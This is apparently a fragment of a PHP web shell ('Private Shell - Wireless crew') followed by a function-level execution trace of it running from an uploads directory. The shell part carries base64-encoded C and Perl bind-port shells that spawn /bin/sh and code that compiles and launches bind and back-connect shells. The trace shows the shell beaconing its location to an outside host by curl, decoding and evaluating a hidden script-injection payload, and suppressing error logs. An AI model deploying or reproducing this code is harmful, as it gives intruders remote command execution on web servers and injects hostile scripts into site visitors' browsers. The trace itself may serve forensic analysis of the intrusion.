$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; \r\n $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; \r\n ?> \r\n

Network tools

\r\n
\r\n Bind port to /bin/sh
\r\n Port: Password: Using: \r\n
\r\n
\r\n Back-connect to
\r\n Server: \'> Port: Using: \r\n

\r\n $out\\n".ex("ps aux | grep bp").""; \r\n } \r\n if($_POST[\'p1\'] == \'bpp\') { \r\n cf("/tmp/bp.pl",$bind_port_p); \r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &"); \r\n echo "
$out\\n".ex("ps aux | grep bp.pl")."
"; \r\n } \r\n if($_POST[\'p1\'] == \'bcc\') { \r\n cf("/tmp/bc.c",$back_connect_c); \r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c"); \r\n @unlink("/tmp/bc.c"); \r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &"); \r\n echo "
$out\\n".ex("ps aux | grep bc")."
"; \r\n } \r\n if($_POST[\'p1\'] == \'bcp\') { \r\n cf("/tmp/bc.pl",$back_connect_p); \r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &"); \r\n echo "
$out\\n".ex("ps aux | grep bc.pl")."
"; \r\n } \r\n } \r\n echo \'
\'; \r\n printFooter(); \r\n} \r\nif( empty($_POST[\'a\']) ) \r\n if(isset($default_action) && function_exists(\'action\' . $default_action)) \r\n $_POST[\'a\'] = $default_action; \r\n else \r\n $_POST[\'a\'] = \'SecInfo\'; \r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) \r\n call_user_func(\'action\' . $_POST[\'a\']); \r\n?> \r\n
Private Shell - Wireless crew © Copyleft 2009 -Pro_Wikileaks
\r\nHacker-newbie.org ' /var/www/html/uploads/refo1.php(4) : eval()'d code 1 0 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 2 $zx = 'localhost' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 3 $wx = '/uploads/refo1.php' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 4 $site = 'localhost/uploads/refo1.php' 4 20 0 0.011792 969856 file_get_contents 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 5 1 'https://spyhackerz.net/save.php?url=localhost/uploads/refo1.php&id=7821718728974864923874' 4 20 1 0.160117 971728 4 20 R '' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 5 $check = '' 4 21 0 0.160288 971560 curl_init 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 9 0 4 21 1 0.160322 972472 4 21 R resource(5) of type (curl) 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 9 $curl = resource(5) of type (curl) 4 22 0 0.160353 972600 curl_setopt 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 10 3 resource(5) of type (curl) 10002 'https://spyhackerz.net/save.php?url=localhost/uploads/refo1.php&id=7821718728974864923874' 4 22 1 0.160373 972696 4 22 R TRUE 4 23 0 0.160386 972472 curl_setopt 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 11 3 resource(5) of type (curl) 19913 TRUE 4 23 1 0.160402 972568 4 23 R TRUE 4 24 0 0.160415 972472 curl_exec 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 12 1 resource(5) of type (curl) 4 24 1 0.538907 972504 4 24 R '' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 12 $check = '' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 22 $linr = 'ZWNobyAiPFNDUklQVCBTUkM9aHR0cDovL2luam' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 23 $winr = 'VjdDByLmNvbS91cGRhdGUuanM+PC9TQ1JJUFQ+Ijs=' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 24 $min = 'base64_decode' 4 25 0 0.539012 972584 base64_decode 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 25 1 'ZWNobyAiPFNDUklQVCBTUkM9aHR0cDovL2luamVjdDByLmNvbS91cGRhdGUuanM+PC9TQ1JJUFQ+Ijs=' 4 25 1 0.539034 972728 4 25 R 'echo "";' 4 26 0 0.539064 973144 eval 1 'echo "";' /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 25 0 4 26 1 0.539083 973144 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 35 $auth_pass = 'e48e13207341b6bffb7fb1622282247b' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 36 $color = '#00ff00' 3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 37 $default_action = 'FilesMan' 4 27 0 0.539127 972696 define 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 38 2 'SELF_PATH' '/var/www/html/uploads/refo1.php(4) : eval()\'d code(1) : eval()\'d code' 4 27 1 0.539145 972800 4 27 R TRUE 4 28 0 0.539159 972728 strpos 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 39 2 'python-requests/2.25.1' 'Google' 4 28 1 0.539174 972800 4 28 R FALSE 4 29 0 0.539188 972728 session_start 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 43 0 4 29 1 0.539261 973480 4 29 R TRUE 4 30 0 0.539276 973480 error_reporting 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 44 1 0 4 30 1 0.539291 973520 4 30 R 0 4 31 0 0.539304 973480 ini_set 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 45 2 'error_log' NULL 4 31 1 0.539320 973552 4 31 R '' 4 32 0 0.539333 973480 ini_set 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 46 2 'log_errors' 0 4 32 1 0.539347 973552 4 32 R '1' 4 33 0 0.539359 973480 ini_set 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 47 2 'max_execution_time' 0 4 33 1 0.539375 973584 4 33 R '30' 4 34 0 0.539388 973480 set_time_limit 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 48 1 0 4 34 1 0.539402 973544 4 34 R FALSE 3 19 1 0.539421 974976 2 7 1 0.539433 863504 1 3 1 0.539440 860200 1 35 0 0.539448 860232 Error->__toString 0 Unknown 0 0 2 36 0 0.539460 860312 Error->getTraceAsString 0 Unknown 0 0 2 36 1 0.539472 860568 2 36 R '#0 /var/www/html/uploads/refo1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/refo1.php(4): eval()\n#2 {main}' 1 35 1 0.539492 864704 1 35 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/refo1.php(4) : eval()\'d code(1) : eval()\'d code:49\nStack trace:\n#0 /var/www/html/uploads/refo1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/refo1.php(4): eval()\n#2 {main}' 0.540620 784184 TRACE END [2023-02-13 01:08:07.769454]